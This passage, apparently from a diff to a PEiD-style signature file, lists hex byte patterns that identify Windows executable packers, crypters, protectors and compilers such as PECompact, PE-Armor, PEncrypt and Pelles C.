+[PE-Armor 0.760-0.765 -> hying]
+signature = 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 00 00 08 00 00 00 00 00 00 00 60 E8 00 00 00 00
+ep_only = false
+
+[PE-Armor V0.7X -> hying]
+signature = 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 55 56 81 C5 ?? ?? ?? ?? 55 C3
+ep_only = true
+
+[PE-Crypt 1.02]
+signature = E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44 21 85 C0 73 02 F7
+ep_only = true
+
+[PE-Crypter]
+signature = 60 E8 00 00 00 00 5D EB 26
+ep_only = true
+
+[PE-PACK 0.99]
+signature = 60 E8 00 00 00 00 5D 83 ED 06 80 BD E0 04 00 00 01 0F 84 F2
+ep_only = true
+
+[PE-PaCK v1.0 -> (C) Copyright 1998 by ANAKiN]
+signature = C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 20 2D 3D FE 20 50 45 2D 50 41 43 4B 20 76 31 2E 30 20 2D FE 2D 20 28 43 29 20 43 6F 70
+ep_only = false
+
+[PE-PACK v1.0 by ANAKiN 1998 (???)]
+signature = 74 ?? E9 ?? ?? ?? ?? 00 00 00 00
+ep_only = true
+
+[PE-PROTECT 0.9]
+signature = E9 CF 00 00 00 0D 0A 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4
+ep_only = true
+
+[PE-Protect 0.9 by Cristoph Gabler 1998]
+signature = 50 45 2D 50 52 4F 54 45 43 54 20 30 2E 39
+ep_only = false
+
+[PE-SHiELD 0.2]
+signature = 60 E8 00 00 00 00 41 4E 41 4B 49 4E 5D 83 ED 06 EB 02 EA 04
+ep_only = true
+
+[Pe123 v2006.4.12]
+signature = 8B C0 60 9C E8 01 00 00 00 C3 53 E8 72 00 00 00 50 E8 1C 03 00 00 8B D8 FF D3 5B C3 8B C0 E8 00 00 00 00 58 83 C0 05 C3 8B C0 55 8B EC 60 8B 4D 10 8B 7D 0C 8B 75 08 F3 A4 61 5D C2 0C 00 E8 00 00 00 00 58 83 E8 05 C3 8B C0 E8 00 00 00 00 58 83 C0 05 C3 8B
+ep_only = true
+
+[Pe123 v2006.4.4]
+signature = 8B C0 EB 01 34 60 EB 01 2A 9C EB 02 EA C8 E8 0F 00 00 00 EB 03 3D 23 23 EB 01 4A EB 01 5B C3 8D 40 00 53 EB 01 6C EB 01 7E EB 01 8F E8 15 01 00 00 50 E8 67 04 00 00 EB 01 9A 8B D8 FF D3 5B C3 8B C0 E8 00 00 00 00 58 83 C0 05 C3 8B C0 55 8B EC 60 8B 4D 10
+ep_only = true
+
+[PEBundle v0.2 - v2.0x]
+signature = 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 6A 04 68 ?? 10 ?? ?? 68 ?? 02 ?? ?? 6A ?? FF 95
+ep_only = true
+
+[PEBundle v2.0b5 - v2.3]
+signature = 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 01 AD ?? ?? ?? ?? 01 AD
+ep_only = true
+
+[PEBundle v2.44]
+signature = 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 83 BD
+ep_only = true
+
+[PEBundle v3.10]
+signature = 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 20 40 00 87 DD ?? ?? ?? ?? 40 00 01
+ep_only = false
+
+[PeCompact 2.53 DLL (Slim Loader) --> BitSum Technologies]
+signature = B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 32 00 00 08 0C 00 48 E1 01 56 57 53 55 8B 5C 24 1C 85 DB 0F 84 AB 21 E8 BD 0E E6 60 0D 0B 6B 65 72 6E 6C 33 32
+ep_only = true
+
+[PECompact 2.xx (Slim Loader) --> BitSum Technologies]
+signature = B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 32 00
+ep_only = true
+
+[PECompact 2.xx --> BitSum Technologies]
+signature = B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00
+ep_only = true
+
+[PECompact v0.90]
+signature = EB 06 68 ?? ?? 40 00 C3 9C 60 BD ?? ?? 00 00 B9 02 00 00 00 B0 90 8D BD 7A 42 40 00 F3 AA 01 AD D9 43 40 00 FF B5
+ep_only = true
+
+[PECompact v0.92]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 BD ?? ?? ?? ?? B9 02 ?? ?? ?? B0 90 8D BD A5 4F 40 ?? F3 AA 01 AD 04 51 40 ?? FF B5
+ep_only = true
+
+[PECompact v0.94]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 ?? ?? ?? ?? 5D 55 58 81 ED ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 01 85 ?? ?? ?? ?? 50 B9 02
+ep_only = true
+
+[PECompact v0.971 - v0.976]
+signature = EB 06 68 C3 9C 60 E8 5D 55 5B 81 ED 8B 85 01 85 66 C7 85
+ep_only = true
+
+[PECompact v0.977]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB A0 86 40 ?? 87 DD 8B 85 2A 87
+ep_only = true
+
+[PECompact v0.978]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 24 88 40 ?? 87 DD 8B 85 A9 88
+ep_only = true
+
+[PECompact v0.978.1]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 49 87 40 ?? 87 DD 8B 85 CE 87
+ep_only = true
+
+[PECompact v0.978.2]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB D1 84 40 ?? 87 DD 8B 85 56 85
+ep_only = true
+
+[PECompact v0.98]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB D7 84 40 ?? 87 DD 8B 85 5C 85
+ep_only = true
+
+[PECompact v0.99]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 2F 85 40 ?? 87 DD 8B 85 B4 85
+ep_only = true
+
+[PECompact v1.00]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB C4 84 40 ?? 87 DD 8B 85 49 85
+ep_only = true
+
+[PECompact v1.10b1]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 28 63 40 ?? 87 DD 8B 85 AD 63
+ep_only = true
+
+[PECompact v1.10b2]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 94 60
+ep_only = true
+
+[PECompact v1.10b3]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 95
+ep_only = true
+
+[PECompact v1.10b4]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 44
+ep_only = true
+
+[PECompact v1.10b5]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 49
+ep_only = true
+
+[PECompact v1.10b6]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 ?? 00 87 DD 8B 85 9A 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 01 85 92 60 40 ?? BB B7
+ep_only = true
+
+[PECompact v1.10b7]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 9A 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 01 85 92 60 40 ?? BB 14
+ep_only = true
+
+[PECompact v1.20 - v1.20.1]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 9A 70 40
+ep_only = true
+
+[PECompact v1.22]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 ?? 70 40 ?? 90 90 01 85 9E 70 40 ?? BB F3 08
+ep_only = true
+
+[PECompact v1.23b3 - v1.24.1]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? D2 08
+ep_only = true
+
+[PECompact v1.24.2 - v1.24.3]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? D2 09
+ep_only = true
+
+[PECompact v1.25]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? F3 0D
+ep_only = true
+
+[PECompact v1.26b1 - v1.26b2]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? 05 0E
+ep_only = true
+
+[PECompact v1.33]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A6 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 00 80 40 ?? 90 90 01 85 9E 80 40 ?? BB E8 0E
+ep_only = true
+
+[PECompact v1.34 - v1.40b1]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A6 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 ?? 00 80 ?? 40 90 90 01 85 9E 80 ?? 40 BB F8 10
+ep_only = true
+
+[PECompact v1.40 - v1.45]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB C3 11
+ep_only = true
+
+[PECompact v1.40b2 - v1.40b4]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 86 11
+ep_only = true
+
+[PECompact v1.40b5 - v1.40b6]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 8A 11
+ep_only = true
+
+[PECompact v1.46]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 60 12
+ep_only = true
+
+[PECompact v1.47 - v1.50]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 5B 12
+ep_only = true
+
+[PECompact v1.4x+]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81
+ep_only = true
+
+[PECompact v1.55]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A2 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 ?? 80 40 ?? 90 90 01 85 9E 80 40 ?? BB 2D 12
+ep_only = true
+
+[PECompact v1.56]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 90 40 ?? 87 DD 8B 85 A2 90 40 ?? 01 85 03 90 40 ?? 66 C7 85 ?? 90 40 ?? 90 90 01 85 9E 90 40 ?? BB 2D 12
+ep_only = true
+
+[PECompact v1.60 - v1.65]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 80 40 ?? 87 DD 8B 85 D2 80 40 ?? 01 85 33 80 40 ?? 66 C7 85 ?? 80 40 ?? 90 90 01 85 CE 80 40 ?? BB BB 12
+ep_only = true
+
+[PECompact v1.66]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 ?? 87 DD 8B 85 E6 90 40 ?? 01 85 33 90 40 ?? 66 C7 85 ?? 90 40 ?? 90 90 01 85 DA 90 40 ?? 01 85 DE 90 40 ?? 01 85 E2 90 40 ?? BB 5B 11
+ep_only = true
+
+[PECompact v1.67]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 87 DD 8B 85 E6 90 40 01 85 33 90 40 66 C7 85 90 40 90 90 01 85 DA 90 40 01 85 DE 90 40 01 85 E2 90 40 BB 8B 11
+ep_only = true
+
+[PECompact v1.68 - v1.84]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 87 DD 8B 85 E6 90 40 01 85 33 90 40 66 C7 85 90 40 90 90 01 85 DA 90 40 01 85 DE 90 40 01 85 E2 90 40 BB 7B 11
+ep_only = true
+
+[PECompact v1.84]
+signature = 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81
+ep_only = true
+
+[PECompact v2.0 beta -> Jeremy Collake]
+signature = B8 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 CC 90 90 90 90
+ep_only = true
+
+[PECompact v2.00 alpha 38]
+signature = B8 ?? ?? ?? ?? 80 B8 BF 10 00 10 01 74 7A C6 80 BF 10 00 10 01 9C 55 53 51 57 52 56 8D 98 0F 10 00 10 8B 53 14 8B E8 6A 40 68 00 10 00 00 FF 73 04 6A 00 8B 4B 10 03 CA 8B 01 FF D0 8B F8 50 8B 33 8B 53 14 03 F2 8B 4B 0C 03 CA 8D 85 B7 10 00 10 FF 73 04 8F
+ep_only = false
+
+[PECompact v2.5 Retail (Slim Loader) -> Bitsum Technologies]
+signature = B8 ?? ?? ?? 01 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 32 00
+ep_only = true
+
+[PECompact v2.5 Retail -> Bitsum Technologies]
+signature = B8 ?? ?? ?? 01 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00
+ep_only = true
+
+[PECompact V2.X-> Bitsum Technologies]
+signature = B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43
+ep_only = true
+
+[PECompact v2.xx]
+signature = B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00
+ep_only = false
+
+[PeCompact2 2.53-2.76 --> BitSum Technologies]
+signature = B8 ?? ?? ?? ?? 55 53 51 57 56 52 8D 98 C9 11 00 10 8B 53 18 52 8B E8 6A 40 68 00 10 00 00 FF 73 04 6A 00 8B 4B 10 03 CA 8B 01 FF D0 5A 8B F8 50 52 8B 33 8B 43 20 03 C2 8B 08 89 4B 20 8B 43 1C 03 C2 8B 08 89 4B 1C 03 F2 8B 4B 0C 03 CA 8D 43 1C 50 57 56 FF
+ep_only = false
+
+[PECrc32 0.88 -> ZhouJinYu]
+signature = 60 E8 00 00 00 00 5D 81 ED B6 A4 45 00 8D BD B0 A4 45 00 81 EF 82 00 00 00
+ep_only = true
+
+[PEcrypt - by archphase]
+signature = 55 8B EC 83 C4 E0 53 56 33 C0 89 45 E4 89 45 E0 89 45 EC ?? ?? ?? ?? 64 82 40 00 E8 7C C7 FF FF 33 C0 55 68 BE 84 40 00 64 FF 30 64 89 20 68 CC 84 40 00 ?? ?? ?? ?? 00 A1 10 A7 40 00 50 E8 1D C8 FF FF 8B D8 85 DB 75 39 E8 3A C8 FF FF 6A 00 6A 00 68 A0 A9 40 00 68 00 04 00 00 50 6A 00 68 00 13 00 00 E8 FF C7 FF FF 6A 00 68 E0 84 40 00 A1 A0 A9 40 00 50 6A 00 E8 ?? ?? ?? ?? E9 7D 01 00 00 53 A1 10 A7 40 00 50 E8 42 C8 FF FF 8B F0 85 F6 75 18 6A 00 68 E0 84 40 00 68 E4 84 40 00 6A 00 E8 71 C8 FF FF E9 53 01 00 00 53 6A 00 E8 2C C8 FF FF A3 ?? ?? ?? ?? 83 3D 48 A8 40 00 00 75 18 6A 00 68 E0 84 40 00 68 F8 84 40 00 6A 00 E8 43 C8 FF FF E9 25 01 00 00 56 E8 F8 C7 FF FF A3 4C A8 40 00 A1 48 A8 40 00 E8 91 A1 FF FF 8B D8 8B 15 48 A8 40 00 85 D2 7C 16 42 33 C0 8B 0D 4C A8 40 00 03 C8 8A 09 8D 34 18 88 0E 40 4A 75 ED 8B 15 48 A8 40 00 85 D2 7C 32 42 33 C0 8D 34 18 8A 0E 80 F9 01 75 05 C6 06 FF EB 1C 8D 0C 18 8A 09 84 ?? ?? ?? ?? ?? 00 EB 0E 8B 0D 4C A8 40 00 03 C8 0F B6 09 49 88 0E 40 4A 75 D1 8D ?? ?? ?? ?? E8 A5 A3 FF FF 8B 45 E8 8D 55 EC E8 56 D5 FF FF 8D 45 EC BA 18 85 40 00 E8 79 BA FF FF 8B 45 EC E8 39 BB FF FF 8B D0 B8 54 A8 40 00 E8 31 A6 FF FF BA 01 00 00 00 B8 54 A8 40 00 E8 12 A9 FF FF E8 DD A1 FF FF 68 50 A8 40 00 8B D3 8B 0D 48 A8 40 00 B8 54 A8 40 00 E8 56 A7 FF FF E8 C1 A1 FF FF
+ep_only = true
+
+[PEEncrypt v4.0b (JunkCode)]
+signature = 66 ?? ?? 00 66 83 ?? 00
+ep_only = true
+
+[PEiD-Bundle v1.00 - v1.01 --> BoB / BobSoft]
+signature = 60 E8 ?? 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A
+ep_only = true
+
+[PEiD-Bundle v1.00 --> BoB / BobSoft]
+signature = 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A
+ep_only = true
+
+[PEiD-Bundle v1.01 --> BoB / BobSoft]
+signature = 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A
+ep_only = true
+
+[PEiD-Bundle v1.02 - v1.03 --> BoB / BobSoft]
+signature = 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44
+ep_only = true
+
+[PEiD-Bundle v1.02 - v1.03 DLL --> BoB / BobSoft]
+signature = 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00
+ep_only = true
+
+[PEiD-Bundle v1.02 - v1.04 --> BoB / BobSoft]
+signature = 60 E8 ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44
+ep_only = true
+
+[Pelles C 2.8.x-4.5.x -> Pelle Orinius]
+signature = 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 83 EC
+ep_only = true
+
+[Pelles C 2.80 -2.90 EXE (X86 CRT-LIB)]
+signature = 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 83 EC ?? 83 EC ?? 53 56 57 89 65 E8 68 00 00 00 ?? E8 ?? ?? ?? ?? 59 A3
+ep_only = true
+
+[Pelles C 2.90, 3.00, 4.00 DLL (X86 CRT-LIB)]
+signature = 55 89 E5 53 56 57 8B 5D 0C 8B 75 10 BF 01 00 00 00 85 DB 75 10 83 3D ?? ?? ?? ?? 00 75 07 31 C0 E9 ?? ?? ?? ?? 83 FB 01 74 05 83 FB 02 75 ?? 85 FF 74
+ep_only = true
+
+[Pelles C 2.x-4.x DLL -> Pelle Orinius]
+signature = 55 89 E5 53 56 57 8B 5D 0C 8B 75 10
+ep_only = true
+
+[Pelles C 3.00, 4.00, 4.50 EXE (X86 CRT-DLL)]
+signature = 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 83 EC ?? 53 56 57 89 65 E8 C7 45 FC ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 BE ?? ?? ?? ?? EB
+ep_only = true
+
+[Pelles C 3.00, 4.00, 4.50 EXE (X86 CRT-LIB)]
+signature = 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 83 EC ?? 53 56 57 89 65 E8 68 00 00 00 02 E8 ?? ?? ?? ?? 59 A3
+ep_only = true
+
+[Pelles C 4.50 DLL (X86 CRT-LIB)]
+signature = 55 89 E5 53 56 57 8B 5D 0C 8B 75 10 85 DB 75 0D 83 3D ?? ?? ?? ?? 00 75 04 31 C0 EB 57 83 FB 01 74 05 83 FB 02 75
+ep_only = true
+
+[PELOCKnt 2.04]
+signature = EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60
+ep_only = true
+
+[PEMangle]
+signature = 60 9C BE ?? ?? ?? ?? 8B FE B9 ?? ?? ?? ?? BB 44 52 4F 4C AD 33 C3
+ep_only = true
+
+[PEncrypt 1.0 -> JunkCode]
+signature = 60 9C BE 00 10 40 00 8B FE B9 ?? ?? ?? ?? BB 78 56 34 12 AD 33 C3 AB E2 FA 9D 61 E9 ?? ?? ?? FF
+ep_only = true
+
+[PEncrypt 2.0 -> junkcode]
+signature = EB 25 00 00 F7 BF 00 00 00 00 00 00 00 00 00 00 12 00 E8 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 00 00 E8 00 00 00 00 5D 81 ED 2C 10 40 00 8D B5 14 10 40 00 E8 33 00 00 00 89 85 10 10 40 00 BF 00 00 40 00 8B F7 03 7F 3C 8B 4F 54 51 56 8D 85
+ep_only = true
+
+[PEncrypt v1.0]
+signature = 60 9C BE 00 10 40 00 8B FE B9 28 03 00 00 BB 78 56 34 12 AD 33 C3 AB E2 FA 9D 61
+ep_only = true
+
+[PEncrypt v3.0]
+signature = E8 00 00 00 00 5D 81 ED 05 10 40 00 8D B5 24 10 40 00 8B FE B9 0F 00 00 00 BB ?? ?? ?? ?? AD 33 C3 E2 FA
+ep_only = true
+
+[PEncrypt v3.1]
+signature = E9 ?? ?? ?? 00 F0 0F C6
+ep_only = true
+
+[PEnguinCrypt v1.0]
+signature = B8 93 ?? ?? 00 55 50 67 64 FF 36 00 00 67 64 89 26 00 00 BD 4B 48 43 42 B8 04 00 00 00 CC 3C 04 75 04 90 90 C3 90 67 64 8F 06 00 00 58 5D BB 00 00 40 00 33 C9 33 C0
+ep_only = true
+
+[PENightMare 2 Beta]
+signature = 60 E9 ?? ?? ?? ?? EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A
+ep_only = true
+
+[PENightMare v1.3]
+signature = 60 E8 00 00 00 00 5D B9 ?? ?? ?? ?? 80 31 15 41 81 F9
+ep_only = true
+
+[PENinja]
+signature = 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
+ep_only = true
+
+[PENinja modified]
